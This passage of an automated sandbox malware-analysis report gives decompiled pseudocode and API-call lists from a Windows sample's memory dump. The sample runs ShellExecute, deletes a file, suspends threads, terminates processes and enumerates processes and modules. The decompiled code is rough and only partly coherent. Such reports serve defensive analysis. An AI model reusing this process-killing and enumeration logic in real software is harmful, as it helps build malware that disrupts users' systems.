						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
